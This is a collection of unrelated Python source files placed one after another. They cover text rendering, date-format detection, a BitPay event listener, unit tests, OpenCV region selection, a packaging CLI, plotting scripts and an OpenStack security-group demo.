self.cache = None
def get_font(self, font_info='font'):
"""Get current font."""
if font_info == 'font':
return self.font_type
elif font_info == 'default':
return Text._font['default']
elif font_info == 'system':
return engine.font.get_fonts()
def get_font_size(self):
"""Get current font size."""
return self.font_size
def set_font_size(self, size):
"""Set font size of text."""
self.font_size = size
if size not in Text._font[self.font_type]:
Text._font[self.font_type][self.font_size] = engine.font.Font(self.font_type,self.font_size)
self.font = Text._font[self.font_type]
self.linesize = self.font[self.font_size].get_linesize()
self.cache = None
def set_font_color(self, color):
"""Set font color of text."""
self.font_color = color
self.cache = None
def set_font_bgcolor(self, color=None):
"""Set font background color."""
self.font_bgcolor = color
self.cache = None
def set_split_text(self, split_text=True):
"""Set whether text split to new line at space."""
self.split_text = split_text
def check_size(self, text):
"""Get size required for given text."""
width, height = self.font[self.font_size].size(text)
return width, height
def check_sizes(self, texts):
"""Get size required for a list of texts."""
text_size = {}
for text in texts:
text_size[text] = self.check_size(text)
return text_size
def surface_size(self, *dim):
"""Surface size needed to fit text. Return estimated width for col and height for row, adjusted for margins."""
try:
col, row = dim[0], dim[1]
except IndexError:
col, row = dim[0]
sizes = [self.check_size(char)[0] for char in 'abcdefghijklmnopqrstuvwxyz ']
charsize = sum(sizes)//len(sizes)
width = (col*charsize) + (self.margin['l']+self.margin['r'])
height = ((row*self.linesize)-2) + (self.margin['t']+self.margin['b'])
return width, height
def word_wrap(self, text, width):
"""Format text lines to fit in surface width, adjusted for margins."""
text_width = width - (self.margin['l']+self.margin['r'])
if isinstance(text, list):
textlines = text
else:
textlines = [line for line in text.splitlines()]
txtlines = []
line_num = 0
space_size = self.check_size(' ')[0]
while True:
try:
line = textlines[line_num]
except IndexError:
break
if self.check_size(line)[0] > text_width:
words = line.split(' ')
txt_line = []
size_sum = 0
word_num = 0
for word in words:
word_size = self.check_size(word)[0]
if word_size > text_width:
ln = self.split_long_text(word, text_width)
if txt_line:
txtlines.append(' '.join(txt_line))
txt_line = []
size_sum = 0
word_num = 0
txtlines.extend(ln)
continue
size_sum += word_size
if size_sum + word_num*space_size <= text_width:
txt_line.append(word)
word_num += 1
else:
txtlines.append(' '.join(txt_line))
txt_line = []
txt_line.append(word)
size_sum = word_size
word_num = 1
if txt_line:
txtlines.append(' '.join(txt_line))
else:
txtlines.append(line)
line_num += 1
return txtlines
def split_long_text(self, text, width):
"""Split long text uninterrupted by spaces to fit in surface width."""
char_size = self.check_sizes(_set(text))
ln = []
chars = []
size_sum = 0
for char in text:
size_sum += char_size[char][0]
if size_sum <= width:
chars.append(char)
else:
ln.append(''.join(chars))
chars = []
chars.append(char)
size_sum = char_size[char][0]
if chars:
ln.append(''.join(chars))
return ln
def has_text(self):
"""Check whether contains text."""
if self.messages:
return True
else:
return False
def clear_text(self):
"""Clear text."""
self.message = None
self.messages = []
def _cache_chr(self, ch):
if self.font_bgcolor:
text_surface = self.font[self.font_size].render(ch, True, self.font_color, self.font_bgcolor)
else:
text_surface = self.font[self.font_size].render(ch, True, self.font_color)
try:
self.cache[ch] = {'image':text_surface, 'width':text_surface.get_width()}
except TypeError:
self.cache_key = self.font_type + str(self.font_size) + str(self.font_color) + str(self.font_bgcolor)
if self.cache_key not in self._cache:
self._cache[self.cache_key] = {}
self.cache = self._cache[self.cache_key]
self.cache[ch] = {'image':text_surface, 'width':text_surface.get_width()}
def _get_width(self, text):
width = 0
for ch in text:
try:
width += self.cache[ch]['width']
except (KeyError, TypeError):
self._cache_chr(ch)
width += self.cache[ch]['width']
return width
def tprint(self):
"""Print text to surface."""
if self.messages != []:
if not self.cache:
self.cache_key = self.font_type + str(self.font_size) + str(self.font_color) + str(self.font_bgcolor)
if self.cache_key not in self._cache:
self._cache[self.cache_key] = {}
self.cache = self._cache[self.cache_key]
if not self.multiline:
text = " ".join(self.messages)
if not self.split_text or text.strip().count(' ') == 0:
if self.center:
width = self._get_width(text)
x = self.x - (width//2)
else:
x = self.x + self.margin['l']
for ch in text:
if ch not in self.cache:
self._cache_chr(ch)
self.surface.blit(self.cache[ch]['image'], (x,self.y))
x += self.cache[ch]['width']
else:
words = text.count(' ')
position_y = self.y - words*(self.linesize//2) - 1
texts = text.split(' ')
for count, text in enumerate(texts):
if self.center:
width = self._get_width(text)
x = self.x - (width//2)
y = position_y + (count*self.linesize)
else:
x = self.x
y = position_y + (count*self.linesize)
for ch in text:
if ch not in self.cache:
self._cache_chr(ch)
self.surface.blit(self.cache[ch]['image'], (x,y))
x += self.cache[ch]['width']
else:
position_y = self.y + self.margin['t']
for count, text in enumerate(self.messages):
if self.center:
width = self._get_width(text)
x = self.x - (width//2)
y = position_y + (count*self.linesize)
else:
x = self.x + self.margin['l']
y = position_y + (count*self.linesize)
for ch in text:
if ch not in self.cache:
self._cache_chr(ch)
self.surface.blit(self.cache[ch]['image'], (x,y))
x += self.cache[ch]['width']
self.message = None
self.messages = []
def update(self):
self.tprint()
def load_image(filename, frames=1, path='data', zipobj=None, fileobj=None, colorkey=None, errorhandle=True):
"""
Load image from file.
Arguments include the image filename, the number of image frames in an image strip, the image path, zipobj for image in a zip file, fileobj for image in a file-like object, image colorkey, and errorhandle for exception handling.
"""
def convert_image(image, colorkey):
if image.get_alpha():
image = image.convert_alpha()
else:
image = image.convert()
if colorkey is not None:
if colorkey == -1:
colorkey = image.get_at((0,0))
image.set_colorkey(colorkey, engine.RLEACCEL)
return image
if zipobj:
import zipfile
try:
from io import BytesIO
except ImportError:
from StringIO import StringIO as BytesIO
if isinstance(zipobj, str):
if path:
data_file = os.path.join(path, zipobj)
else:
data_file = zipobj
dat = zipfile.ZipFile(data_file)
fileobj = BytesIO(dat.open(filename).read())
dat.close()
else:
fileobj = BytesIO(zipobj.open(filename).read())
full_name = fileobj
namehint = filename
elif fileobj:
full_name = fileobj
namehint = filename
else:
if path:
full_name = os.path.join(path, filename)
else:
full_name = filename
namehint = ''
try:
if frames == 1:
image = engine.image.load(full_name, namehint)
image = convert_image(image, colorkey)
return image
elif frames > 1:
images = []
image = engine.image.load(full_name, namehint)
width, height = image.get_size()
width = width // frames
for frame in range(frames):
frame_num = width * frame
image_frame = image.subsurface((frame_num,0,width,height)).copy()
image_frame.set_alpha(image.get_alpha())
image_frame = convert_image(image_frame, colorkey)
images.append(image_frame)
return images
except engine.error:
if errorhandle:
raise
else:
raise IOError
return None
|
"""
Copyright 2020 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
This module will detect the type(Consistent, all ambiguous, inconsistent column)
a passed column is & also wether day_first is True/False for that column.
"""
import datetime
import pandas
from util import enums
def get_column_type_and_order(column):
"""
This function classifies the column into the 3 types based on
the values in it. It also returns the day_first = Bool for the column.
Args - column - type list
Returns - dict - {type, day_first}}
type = attribute of enums.ColumnTypes ex ColumnTypes.CONSISTENT
in case of 'Constient' column day_first = True / False
"""
# Convert integers in the list to strings
column = [str(entry) for entry in column]
# True / False for unambiguous dates & None for ambiguous dates
count_date_type = {True : 0, False : 0, None : 0}
for date in column:
# if month & day can be interchanged for a date we consider it ambiguous
if _to_datetime(date, True) != _to_datetime(date, False) or \
_to_datetime(date, True).month == _to_datetime(date, True).day:
count_date_type[None] += 1
elif _is_day_first(date):
count_date_type[True] += 1
else:
count_date_type[False] += 1
column_type_and_order = {}
if count_date_type[True] != 0 and count_date_type[False] != 0:
# Inconsistent type column
column_type_and_order['type'] = enums.ColumnTypes.INCONSISTENT
column_type_and_order['day_first'] = None
elif count_date_type[True] != 0:
column_type_and_order['type'] = enums.ColumnTypes.CONSISTENT
column_type_and_order['day_first'] = True
elif count_date_type[False] != 0:
column_type_and_order['type'] = enums.ColumnTypes.CONSISTENT
column_type_and_order['day_first'] = False
else:
column_type_and_order['type'] = enums.ColumnTypes.ALL_AMBIGUOUS
column_type_and_order['day_first'] = None
return column_type_and_order
def _is_day_first(date):
"""
This function looks into the date(string) and decides if
day occurs first in it. Date passed should be unambiguous.
Args :
date - Type string
Returns :
Bool - True if day occurs before month.
"""
date_datetime = _to_datetime(date, None)
# Removing time from the date
# Here it is assumed that time is present in the from '%H:%M:%S'
# Other possible time formats can be added to the list possible_times
date_without_time = date
possible_times = [_to_str(date_datetime.hour) + ':' +
_to_str(date_datetime.minute) + ':' +
_to_str(date_datetime.second)]
if date.find(possible_times[0]) != -1:
date_without_time = date.replace(possible_times[0], '')
date = date_without_time
# Removing Year from the date
# Only last 2 digits of year may be present
# Ex. sometines 1998 is represented as 98
date_without_year = date
# List of possible years mentioned in date
possible_years = [str(date_datetime.year), str(date_datetime.year % 100)]
if date.find(possible_years[0]) != -1:
date_without_year = date.replace(possible_years[0], '')
else:
date_without_year = date.replace(possible_years[1], '')
date = date_without_year
# Now as both time and year are removed from date string we are only left
# with day & month
return date.find(str(date_datetime.day)) < date.find(str(date_datetime.month))
def _to_str(num):
"""
This function converts the number passed to a string,
it just adds a '0' if number passed is of single digit.
Args :
num - int
Returns :
string
"""
if num < 10:
return '0' + str(num)
else:
return str(num)
def _to_datetime(date, day_first):
"""
As pandas to_datetime returns a timestramp - this function converts it to
a datetime object using the strptime method.
Args :
date - string representing date
day_first - Bool/None
Argument required to parse ambiguous dates.
Returns :
date as a datetime object
"""
# converting str date to a timestamp format ex- '2019-08-05 17:51:29'
date_timestamp = str(pandas.to_datetime(date, dayfirst=day_first))
# converting the timestamp to datetime object
date_datetime = datetime.datetime.strptime(date_timestamp,
'%Y-%m-%d %H:%M:%S')
return date_datetime
|
#!/usr/bin/env python
import json
import requests
import threading
from retrying import retry
EVENT_ENDPOINT = 'https://bitpay.com/events'
CONTENT_TYPE_HEADER = {'content-type': 'text/event-stream'}
SUBSCRIBE_QUERY = 'action=subscribe&events%%5B%%5D=payment&token=%s'
STATUS_FIELD = 'status'
STATUS_EXPIRED = 'expired'
STATUS_PAID = 'paid'
STATUS_NO_CONNECTION = 'no connection'
class BitPayEventSource(threading.Thread):
def __init__(self, token, callback, event_endpoint = EVENT_ENDPOINT,
retrying = True):
super(BitPayEventSource, self).__init__()
self.token = token
self.callback = callback
self.event_endpoint = event_endpoint
self.retrying = retrying
self.is_active = True
def run(self):
if self.retrying:
self.connect_with_retrying()
else:
try:
self.connect()
except requests.ConnectionError:
self.callback(STATUS_NO_CONNECTION)
def stop(self):
self.is_active = False
@retry(wait_exponential_multiplier=250, wait_exponential_max=30000) # ms
def connect_with_retrying(self):
self.connect()
def connect(self):
if not self.is_active:
return
params = SUBSCRIBE_QUERY % self.token
r = requests.get(self.event_endpoint, headers=CONTENT_TYPE_HEADER,
params=params, stream=True)
for line in r.iter_lines(chunk_size=1):
if not self.is_active:
break
if ':' not in line:
continue
(field, value) = line.strip().split(':', 1)
field = field.strip()
if field != "data":
continue
try:
j = json.loads(value)
if not STATUS_FIELD in j:
continue
if j[STATUS_FIELD] == STATUS_EXPIRED:
self.callback(STATUS_EXPIRED)
if j[STATUS_FIELD] == STATUS_PAID:
self.callback(STATUS_PAID)
except ValueError:
pass
|
# Testing module instance_type.i2
import pytest
import ec2_compare.internal.instance_type.i2
def test_get_internal_data_instance_type_i2_get_instances_list():
assert len(ec2_compare.internal.instance_type.i2.get_instances_list()) > 0
def test_get_internal_data_instance_type_i2_get():
assert len(ec2_compare.internal.instance_type.i2.get) > 0
|
# Library imports
from urllib.request import urlopen, FancyURLopener, Request
class TWURLOpener(FancyURLopener):
# UrlOpener version info
version = "PyTwitch"
|
#!/usr/bin/env python
#import freenect
import numpy as np
import cv2
import time
from matplotlib import pyplot as plt
import copy
# calibrate kinect to world
# https://github.com/amiller/libfreenect-goodies/blob/master/calibkinect.py
# also check out mouse_and_match
class User_ROI_Selection:
NUM_FRAMES = 0
IMAGE_ARRAY = None
FRAMES_TO_AVERAGE = 10
# initialize the list of reference points and boolean indicating
# whether cropping is being performed or not
refPt = []
cropping = False
image = None
interacting = False
def __init__(self, image):
self.image = image
def blurred_edge(self, image, blur_index):
# convert the image to grayscale, blur it, and find edges
# in the image
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
gray = cv2.bilateralFilter(gray, 11, 17, 17)
gray = cv2.blur(gray,(blur_index,blur_index))
edged = cv2.Canny(gray, 30, 200)
return edged
def click_and_crop(self, event, x, y, flags, param):
# print "Event, ", event
# print "refpt, ", self.refPt
# grab references to the global variables
# refPt = self.refPt
cropping = self.cropping
# if the left mouse button was clicked, record the starting
# (x, y) coordinates and indicate that cropping is being
# performed
if event == cv2.EVENT_LBUTTONDOWN:
print "Cropping"
self.refPt = [(x, y)]
cropping = True
# check to see if the left mouse button was released
elif event == cv2.EVENT_LBUTTONUP:
print "Released"
# record the ending (x, y) coordinates and indicate that
# the cropping operation is finished
self.refPt.append((x, y))
cropping = False
print "refpt, ", self.refPt
# draw a rectangle around the region of interest
if len(self.refPt) == 2:
img_copy = self.image.copy()
cv2.rectangle(img_copy, self.refPt[0], self.refPt[1], (155, 167, 120), 5)
cv2.imshow("image copy", img_copy)
# if there are two reference points, then crop the region of interest
# from teh image and display it
print "Displaying cropped image"
roi = self.image[self.refPt[0][1]:self.refPt[1][1], self.refPt[0][0]:self.refPt[1][0]]
cv2.imshow("ROI", roi)
cv2.waitKey(1)
self.refPt = []
def user_selection(self):
# have user define and show region of interest
# load the image, clone it, and setup the mouse callback function
image = self.image
clone = image.copy()
cv2.namedWindow("image")
cv2.setMouseCallback("image", self.click_and_crop)
# keep looping until the 'q' key is pressed
while True:
# display the image and wait for a keypress
cv2.imshow("image", image)
key = cv2.waitKey(1) & 0xFF
# if the 'r' key is pressed, reset the cropping region
if key == ord("r"):
image = clone.copy()
# if the 'c' key is pressed, break from the loop
elif key == ord("c"):
break
elif key == ord("s"):
# cv2.imwrite("saved", image)
pass
# close all open windows
cv2.destroyAllWindows()
self.interacting = False
if __name__ == "__main__":
img = cv2.img = cv2.imread("images/saved.jpg", 1)
x = User_ROI_Selection(img)
x.user_selection() |
import logging
import os
import pytest
from testing.functional_tests.t_utils import __tmp_dir__, create_tmp_dir, __data_testing_dir__, download_functional_test_files
from testing.common_testing_util import remove_tmp_dir
logger = logging.getLogger(__name__)
def setup_function():
create_tmp_dir()
@pytest.mark.script_launch_mode('subprocess')
def test_automate_training(download_functional_test_files, script_runner):
file_config = os.path.join(__data_testing_dir__, 'automate_training_config.json')
file_config_hyper = os.path.join(__data_testing_dir__,
'automate_training_hyperparameter_opt.json')
__output_dir__ = os.path.join(__tmp_dir__, 'results')
ret = script_runner.run('ivadomed_automate_training', '--config', f'{file_config}',
'--config-hyper', f'{file_config_hyper}',
'--path-data', f'{__data_testing_dir__}',
'--output_dir', f'{__output_dir__}')
print(f"{ret.stdout}")
print(f"{ret.stderr}")
assert ret.success
assert os.path.exists(os.path.join(__output_dir__, 'detailed_results.csv'))
assert os.path.exists(os.path.join(__output_dir__, 'temporary_results.csv'))
assert os.path.exists(os.path.join(__output_dir__, 'average_eval.csv'))
@pytest.mark.script_launch_mode('subprocess')
def test_automate_training_run_test(download_functional_test_files, script_runner):
file_config = os.path.join(__data_testing_dir__, 'automate_training_config.json')
file_config_hyper = os.path.join(__data_testing_dir__,
'automate_training_hyperparameter_opt.json')
__output_dir__ = os.path.join(__tmp_dir__, 'results')
ret = script_runner.run('ivadomed_automate_training', '--config', f'{file_config}',
'--config-hyper', f'{file_config_hyper}',
'--path-data', f'{__data_testing_dir__}',
'--output_dir', f'{__output_dir__}',
'--run-test')
print(f"{ret.stdout}")
print(f"{ret.stderr}")
assert ret.success
assert os.path.exists(os.path.join(__output_dir__, 'detailed_results.csv'))
assert os.path.exists(os.path.join(__output_dir__, 'temporary_results.csv'))
assert os.path.exists(os.path.join(__output_dir__, 'average_eval.csv'))
def teardown_function():
remove_tmp_dir()
|
#!/usr/bin/env python3
# Copyright 2020 Unai Martinez-Corral <unai.martinezcorral@ehu.eus>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
from pathlib import Path
from os import listdir
from sys import exit as sys_exit
from pyAttributes.ArgParseAttributes import (
ArgParseMixin,
ArgumentAttribute,
Attribute,
CommandAttribute,
CommonSwitchArgumentAttribute,
DefaultAttribute,
SwitchArgumentAttribute,
)
from config import Config
from assets import get_json_from_api, extract_from_json, releases_report
from debian import (
check_debian_latest,
get_debs_list,
get_debs,
debian_report,
extract_debs,
)
from fedora import check_fedora_latest
ROOT = Path(__file__).parent.parent
class Tool:
HeadLine = "dbhi/qus CLI tool"
def __init__(self):
pass
def PrintHeadline(self):
print("{line}".format(line="=" * 80))
print("{headline: ^80s}".format(headline=self.HeadLine))
print("{line}".format(line="=" * 80))
@staticmethod
def assets(fname: Path = ROOT / "releases.json", report: Path = ROOT / "report.md"):
(TARGETS, TABLES) = extract_from_json(get_json_from_api(fname))
TARGETS.sort()
releases_report(TARGETS, TABLES, report)
@staticmethod
def debian(report: Path = ROOT / "debian.md"):
tmpdir = ROOT / "tmp_deb"
debs = get_debs_list()
get_debs(debs, tmpdir)
targets = []
extract_debs(targets, debs, tmpdir)
targets.sort()
debian_report(targets, debs, report)
class CLI(Tool, ArgParseMixin):
def __init__(self):
import argparse
import textwrap
# Call constructor of the main interitance tree
super().__init__()
# Call constructor of the ArgParseMixin
ArgParseMixin.__init__(
self,
description=textwrap.dedent(
"Tool for building (multiarch) images, and for easily browsing publicly available tags and assets."
),
epilog=textwrap.fill("Happy hacking!"),
formatter_class=argparse.RawDescriptionHelpFormatter,
add_help=False,
)
def Run(self):
ArgParseMixin.Run(self)
@DefaultAttribute()
def HandleDefault(self, args):
self.PrintHeadline()
self.MainParser.print_help()
@CommandAttribute("help", help="Display help page(s) for the given command name.")
@ArgumentAttribute(
metavar="<Command>",
dest="Command",
type=str,
nargs="?",
help="Print help page(s) for a command.",
)
def HandleHelp(self, args):
if args.Command == "help":
print("This is a recursion ...")
return
if args.Command is None:
self.PrintHeadline()
self.MainParser.print_help()
else:
try:
self.PrintHeadline()
self.SubParsers[args.Command].print_help()
except KeyError:
print("Command {0} is unknown.".format(args.Command))
@CommandAttribute("check", help="Check if new releases are available upstream (Debian/Fedora).")
def HandleCheck(self, _):
ecode = 0
if check_debian_latest() is not None:
ecode = 1
if check_fedora_latest() is not None:
ecode = 1
sys_exit(ecode)
@CommandAttribute("arch", help="Get normalised architecture key/name.")
@ArgumentAttribute(
"-u",
"--usage",
dest="Usage",
type=str,
help="Target usage to get the normalised name for.",
default=None,
)
@ArgumentAttribute(
"-a",
"--arch",
dest="Arch",
type=str,
help="Target architecture to get the normalised name for.",
default="amd64",
)
def HandleArch(self, args):
print(Config().normalise_arch(args.Usage, args.Arch))
@CommandAttribute("version", help="Get version items for a usage and host (arch).")
@ArgumentAttribute(
"-u",
"--usage",
dest="Usage",
type=str,
help="Target usage to get the version for.",
default=None,
)
@ArgumentAttribute(
"-a",
"--arch",
dest="Arch",
type=str,
help="Target architecture to get the version for.",
default="amd64",
)
def HandleVersion(self, args):
items = Config().version(args.Usage, args.Arch)
print("{0} {1}".format(items[0], items[1]))
@CommandAttribute("assets", help="Generate report of available releases and assets.")
def HandleAssets(self, _):
self.assets()
@CommandAttribute("debian", help="Generate report of available resources in DEB packages.")
def HandleDebian(self, _):
self.debian()
if __name__ == "__main__":
CLI().Run()
|
"""Unit tests for the selected_tests script."""
import json
import os
import unittest
from buildscripts import errorcodes
# Debugging
errorcodes.list_files = True
TESTDATA_DIR = './buildscripts/tests/data/errorcodes/'
class TestErrorcodes(unittest.TestCase):
"""Test errorcodes.py."""
def setUp(self):
# errorcodes.py keeps some global state.
errorcodes.codes = []
def test_regex_matching(self):
"""Test regex matching."""
captured_error_codes = []
def accumulate_files(code):
captured_error_codes.append(code)
errorcodes.parse_source_files(accumulate_files, TESTDATA_DIR + 'regex_matching/')
self.assertEqual(26, len(captured_error_codes))
def test_dup_checking(self):
"""Test dup checking."""
assertions, errors, _ = errorcodes.read_error_codes(TESTDATA_DIR + 'dup_checking/')
# `assertions` is every use of an error code. Duplicates are included.
self.assertEqual(4, len(assertions))
self.assertEqual([1, 2, 3, 2], list(map(lambda x: int(x.code), assertions)))
# All assertions with the same error code are considered `errors`.
self.assertEqual(2, len(errors))
self.assertEqual(2, int(errors[0].code))
self.assertEqual(2, int(errors[1].code))
def test_generate_next_code(self):
"""Test `get_next_code`."""
_, _, seen = errorcodes.read_error_codes(TESTDATA_DIR + 'generate_next_code/')
generator = errorcodes.get_next_code(seen)
self.assertEqual(21, next(generator))
self.assertEqual(22, next(generator))
def test_generate_next_server_code(self):
""" This call to `read_error_codes` technically has no bearing on `get_next_code` when a
`server_ticket` is passed in. But it maybe makes sense for the test to do so in case a
future patch changes that relationship."""
_, _, seen = errorcodes.read_error_codes(TESTDATA_DIR + 'generate_next_server_code/')
print("Seen: " + str(seen))
generator = errorcodes.get_next_code(seen, server_ticket=12301)
self.assertEqual(1230101, next(generator))
self.assertEqual(1230103, next(generator))
def test_ticket_coersion(self):
"""Test `coerce_to_number`."""
self.assertEqual(0, errorcodes.coerce_to_number(0))
self.assertEqual(1234, errorcodes.coerce_to_number('1234'))
self.assertEqual(1234, errorcodes.coerce_to_number('server-1234'))
self.assertEqual(1234, errorcodes.coerce_to_number('SERVER-1234'))
self.assertEqual(-1, errorcodes.coerce_to_number('not a ticket'))
|
#encoding:utf-8
import word_util
import codecs
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import random
def word_idf_equal_zero(word_idf_map):
idf_0_list = list(map(lambda x:float(word_idf_map[x])<1e-6,word_idf_map))
#print(type(idf_0_list))
count_idf_count_zero = np.sum(idf_0_list)
#print(type(count_idf_count_zero))
return count_idf_count_zero,count_idf_count_zero/np.size(idf_0_list)
def plot_hist_word_idf(x):
fig= plt.subplots(1, 1, figsize = (8, 4))
plt.hist(x)
plt.show()
if __name__ == "__main__":
word_idf_file = "../out/global_idf.txt"
word_idf_map = word_util.build_word_idf_hashmap(word_idf_file)
count_idf_0,proportion_idf_0 = word_idf_equal_zero(word_idf_map)
print(count_idf_0, proportion_idf_0)
list_idf = list(map(lambda x:float(word_idf_map[x]),word_idf_map))
#print(list_idf)
plot_hist_word_idf(list_idf)
|
from SloppyCell.ReactionNetworks import *
net = IO.from_SBML_file('BIOMD0000000051.xml', 'base')
net.compile()
traj = Dynamics.integrate(net, [0, 40])
Plotting.figure(1, figsize=(8,8))
Plotting.clf()
vars = ['cglcex','cfdp','cg1p','cg6p','cpep','cpyr','cf6p','cgap','cpg']
for ii, v in enumerate(vars):
ax = Plotting.subplot(3,3, ii + 1)
Plotting.plot_trajectory(traj, [v])
if ax.is_last_row():
Plotting.xticks([0, 10, 20, 30])
else:
Plotting.xticks([])
if ii//3 == 0:
Plotting.axis([0, 40, 0, 3.4])
elif ii//3 == 1:
Plotting.axis([0, 40, 0, 6.75])
elif ii//3 == 2:
Plotting.axis([0, 40, 0, 1.4])
if not ax.is_first_col():
Plotting.yticks([])
Plotting.subplots_adjust(wspace=0, hspace=0)
Plotting.figure(2, figsize=(6,10))
Plotting.clf()
vars = ['cg6p', 'cf6p', 'cpep', 'cpyr']
for ii, v in enumerate(vars):
ax = Plotting.subplot(4,1, ii + 1)
Plotting.plot_trajectory(traj, [v])
if not ax.is_last_row():
Plotting.xticks([])
if ii == 0:
Plotting.axis([0, 1, 3, 6])
elif ii == 1:
Plotting.axis([0, 1, 0.4, 0.9])
elif ii == 2:
Plotting.axis([0, 1, 1.5, 3.25])
elif ii == 3:
Plotting.axis([0, 1, 2.5, 4.25])
Plotting.subplots_adjust(wspace=0, hspace=0)
Plotting.figure(3, figsize=(6,10))
Plotting.clf()
vars = [('catp', 'cadp', 'camp'), ('cnad', 'cnadh'), ('cnadp', 'cnadph')]
for ii, v in enumerate(vars):
ax = Plotting.subplot(3,1, ii + 1)
Plotting.plot_trajectory(traj, v)
if not ax.is_last_row():
Plotting.xticks([])
if ii == 0:
Plotting.axis([0, 40, 0, 5])
elif ii == 1:
Plotting.axis([0, 40, 0, 2.0])
elif ii == 2:
Plotting.axis([0, 40, 0.04, 0.24])
Plotting.subplots_adjust(wspace=0, hspace=0)
|
"""
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
import datetime
from personnel.models import Person, JobPosting, Organization
from lab_website.tests import BasicTests
MODELS = [Person, JobPosting]
class PersonnelModelTests(BasicTests):
"""Tests the model attributes of ::class:`Personnel` objects contained in the ::mod:`personnel` app."""
fixtures = ['test_personnel']
def test_full_name(self):
'''This is a test for the rendering of the full name from a ::class:`Person` object.'''
fixture_personnel = Person.objects.get(first_name='John', last_name='Doe')
self.assertEquals(fixture_personnel.full_name(), 'John Doe')
def test_name_slug(self):
'''This is a test for the rendering of the name_slug field from a ::class:`Person` object.'''
fixture_personnel = Person.objects.get(first_name='John', last_name='Doe')
self.assertEquals(fixture_personnel.name_slug, 'john-doe')
def test_personnel_permalink(self):
'''This is a test that the permalink for a ::class:`Person` object is correctly rendered as **/personnel/<name_slug>**'''
fixture_personnel = Person.objects.get(first_name='John', last_name='Doe')
self.assertEquals(fixture_personnel.get_absolute_url(), '/people/john-doe/')
def test_create_labmember_minimal(self):
'''This is a test for creating a new ::class:`Person` object, with only the minimum fields being entered'''
test_labmember = Person(first_name = 'Joe',
last_name = 'Blow', alumni=False, current_lab_member=True)
test_labmember.save()
#test that the slugfiy function works correctly
self.assertEquals(test_labmember.name_slug, u'joe-blow')
class PersonnelViewTests(BasicTests):
"""Tests the views of ::class:`Personnel` objects contained in the ::mod:`personnel` app."""
fixtures = ['test_personnel']
def test_laboratory_personnel(self):
'''This function tests the laboratory-personnel view.'''
test_response = self.client.get('/people/')
self.assertEqual(test_response.status_code, 200)
self.assertTrue('personnel' in test_response.context)
self.assertTemplateUsed(test_response, 'personnel_list.html')
self.assertEqual(test_response.context['personnel_type'], 'current')
self.assertEqual(test_response.context['personnel'][0].pk, 1)
self.assertEqual(test_response.context['personnel'][0].first_name, 'John')
self.assertEqual(test_response.context['personnel'][0].last_name, 'Doe')
def test_personnel_detail(self):
'''This function tests the personnel-details view.'''
test_response = self.client.get('/people/john-doe/')
self.assertEqual(test_response.status_code, 200)
self.assertTrue('person' in test_response.context)
self.assertTemplateUsed(test_response, 'base.html')
self.assertTemplateUsed(test_response, 'personnel_detail.html')
self.assertEqual(test_response.context['person'].pk, 1)
self.assertEqual(test_response.context['person'].first_name, 'John')
self.assertEqual(test_response.context['person'].last_name, 'Doe')
class JobPostingModelTests(BasicTests):
"""Tests the model attributes of ::class:`JobPosting` objects contained in the ::mod:`personnel` app."""
fixtures = ['test_organization',]
def test_create_jobposting_minimal(self):
'''This is a test for creating a new ::class:`JobPosting` object, with only the minimum fields being entered'''
test_jobposting = JobPosting(title = 'Postdoctoral Researcher',
description = 'Some description',
link = 'http:/jobs.com/awesomejob',
active=True)
test_jobposting.save()
self.assertEqual(test_jobposting.pk, 1)
def test_create_jobposting_all(self):
'''This is a test for creating a new ::class:`JobPosting` object, with only the minimum fields being entered'''
test_jobposting = JobPosting(title = 'Postdoctoral Researcher',
description = 'Some description',
link = 'http:/jobs.com/awesomejob',
hiringOrganization = Organization.objects.get(pk=1),
education = "An educational requirement",
qualifications = "Some qualifications",
responsibilities = "Some responsibilities",
active = True)
test_jobposting.save()
self.assertEqual(test_jobposting.pk, 1)
def test_jobposting_unicode(self):
'''This test creates a new :class:`~personnel.models.JobPosting` object, then tests for the unicode representation of it.'''
test_jobposting = JobPosting(title = 'Postdoctoral Researcher',
description = 'Some description',
link = 'http:/jobs.com/awesomejob',
active=True)
test_jobposting.save()
self.assertEqual(test_jobposting.__unicode__(), 'Postdoctoral Researcher Job Posting (%s)' %(datetime.date.today()) )
|
# Import the OpenStack connection class from the SDK
from openstack import connection
# Create a connection object by calling the constructor and pass the security information
conn = connection.Connection(auth_url="http://192.168.0.106/identity",
project_name="demo",
username="admin",
password="manoj",
user_domain_id="default",
project_domain_id="default")
def assign_security_group_to_vm(conn):
server_id="613bf835-5eb7-4a4b-ae9c-e0f6f6665f2b"
security_group_id="d2e47c84-1d31-4008-8192-29cc207338b9"
conn.compute.add_security_group_to_server(server_id, security_group_id)
def remove_security_group_from_vm(conn):
server_id="613bf835-5eb7-4a4b-ae9c-e0f6f6665f2b"
security_group_id="d2e47c84-1d31-4008-8192-29cc207338b9"
conn.compute.remove_security_group_from_server(server_id, security_group_id)
def security_groups(conn):
for port in conn.network.security_groups():
print(port)
#assign_security_group_to_vm(conn)
#remove_security_group_from_vm(conn)
security_groups(conn)
|
from osr2mp4.ImageProcess import imageproc
from osr2mp4.ImageProcess.PrepareFrames.YImage import YImage
urarrow = "editor-rate-arrow"
def prepare_urarrow(settings):
frame = YImage(urarrow, settings, settings.scale * settings.settings["Score meter size"] * 0.75, defaultpath=True).img
imageproc.changealpha(frame, 0.85)
return [frame]
|
"""Resources management (files/directories/etc.)."""
__version__ = '0.1.3'
|
#!/usr/bin/python2.4
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
